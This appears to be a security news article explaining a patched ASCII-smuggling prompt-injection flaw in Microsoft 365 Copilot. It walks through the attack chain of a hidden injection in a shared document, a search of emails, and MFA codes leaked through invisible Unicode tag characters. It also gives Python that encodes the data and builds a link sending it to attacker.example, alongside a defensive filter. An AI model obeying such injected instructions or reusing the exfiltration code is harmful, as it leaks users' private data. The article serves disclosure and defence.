Microsoft has recently addressed a vulnerability in Microsoft 365 Copilot that could have enabled the theft of sensitive user information using a technique called ASCII smuggling. This vulnerability, now patched, highlights the ongoing challenges in securing artificial intelligence (AI) tools against sophisticated attacks.
What is ASCII smuggling?
ASCII smuggling is a novel technique that uses special Unicode characters from the Tags block that mirror ASCII characters but are not rendered in the user interface. This allows attackers to embed invisible data within clickable hyperlinks, effectively staging the data for exfiltration.
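As a minimal sketch of the idea, the Unicode Tags block (U+E0000 to U+E007F) mirrors the ASCII range, so each ASCII character can be shifted into an invisible counterpart and shifted back. The function names below are illustrative, not from any disclosed proof of concept:

```python
def smuggle(text: str) -> str:
    # Map each ASCII character to its counterpart in the Unicode Tags
    # block (U+E0000-U+E007F), which most user interfaces do not render.
    return "".join(chr(0xE0000 + ord(c)) for c in text if ord(c) < 0x80)

def reveal(hidden: str) -> str:
    # Reverse the offset to recover the original ASCII text.
    return "".join(
        chr(ord(c) - 0xE0000) for c in hidden if 0xE0000 <= ord(c) <= 0xE007F
    )

hidden = smuggle("MFA code: 123456")
print(reveal(hidden))  # prints "MFA code: 123456"
```

The round trip is lossless, yet the intermediate string is effectively invisible when displayed, which is what makes it useful for staging data inside otherwise innocuous-looking text.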
How the attack works
The attack involves a series of steps:
- Trigger prompt injection: Malicious content concealed in a document shared in the chat triggers a prompt injection.
- Search for emails and documents: The injected payload instructs Copilot to search for additional emails and documents.
- ASCII smuggling: The attacker uses ASCII smuggling to entice the user into clicking a link, leading to the exfiltration of valuable data to a third-party server.
The outcome of this attack chain is the potential transmission of sensitive data, including multi-factor authentication (MFA) codes, to an adversary-controlled server.
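To make the final step concrete, a crafted hyperlink could carry the stolen data both invisibly in its anchor text and openly in its URL. This is a hypothetical illustration (the domain `attacker.example` and both helper names are made up for this sketch):

```python
from urllib.parse import quote

def tag_encode(text: str) -> str:
    # Invisible Unicode Tags representation of ASCII text.
    return "".join(chr(0xE0000 + ord(c)) for c in text if ord(c) < 0x80)

def craft_link(stolen: str) -> str:
    # Hypothetical sketch: the visible anchor text looks harmless, while the
    # invisible payload rides along in the link text and the URL carries the
    # data to an attacker-controlled server when clicked.
    visible = "Click here to verify your account"
    return (
        f"[{visible}{tag_encode(stolen)}]"
        f"(https://attacker.example/c?d={quote(stolen)})"
    )

link = craft_link("MFA=493021")
```

Rendered as markdown, the link shows only the benign visible text; the smuggled characters and the query string do the exfiltration.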
Proof-of-concept attacks
Proof-of-concept (PoC) attacks have been demonstrated against Microsoft’s Copilot system, showcasing the ability to manipulate responses, exfiltrate private data, and bypass security protections. These methods, detailed by Zenity, include retrieval-augmented generation (RAG) poisoning and indirect prompt injection, which can lead to remote code execution-style attacks that give an attacker full control of Microsoft Copilot and other AI apps.
Turning AI into a spear-phishing machine
One of the most novel demonstrations turns the AI itself into a spear-phishing machine. The red-teaming technique, dubbed LOLCopilot, allows an attacker with access to a victim’s email account to send phishing messages that mimic the compromised user’s style.
Microsoft’s response
Microsoft acknowledged the issues and addressed them following responsible disclosure in January 2024. The company has also stressed the importance of evaluating risk tolerance and exposure to prevent data leaks from Copilot Studio bots (formerly Power Virtual Agents), and of enabling Data Loss Prevention and other security controls to govern the creation and publication of Copilots.
The patching of the ASCII smuggling flaw in Microsoft 365 Copilot underscores the need for continuous monitoring and securing of AI tools against evolving threats. As AI technologies become more integrated into daily operations, the importance of robust security measures to protect sensitive user information cannot be overstated.
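One defensive measure follows directly from how the technique works: since the smuggled data lives in a well-defined Unicode range, output can be sanitized before it is rendered. This is a minimal sketch of such a filter, not Microsoft's actual mitigation:

```python
def strip_invisible_tags(text: str) -> str:
    # Defensive sketch: drop Unicode Tags-block code points
    # (U+E0000-U+E007F) from model output before rendering it,
    # so invisibly smuggled ASCII cannot ride along in links.
    return "".join(c for c in text if not 0xE0000 <= ord(c) <= 0xE007F)

clean = strip_invisible_tags("Click here" + chr(0xE004D) + chr(0xE0046))
print(clean)  # prints "Click here"
```

A production filter would likely also normalize or flag other invisible and confusable characters rather than silently stripping a single block.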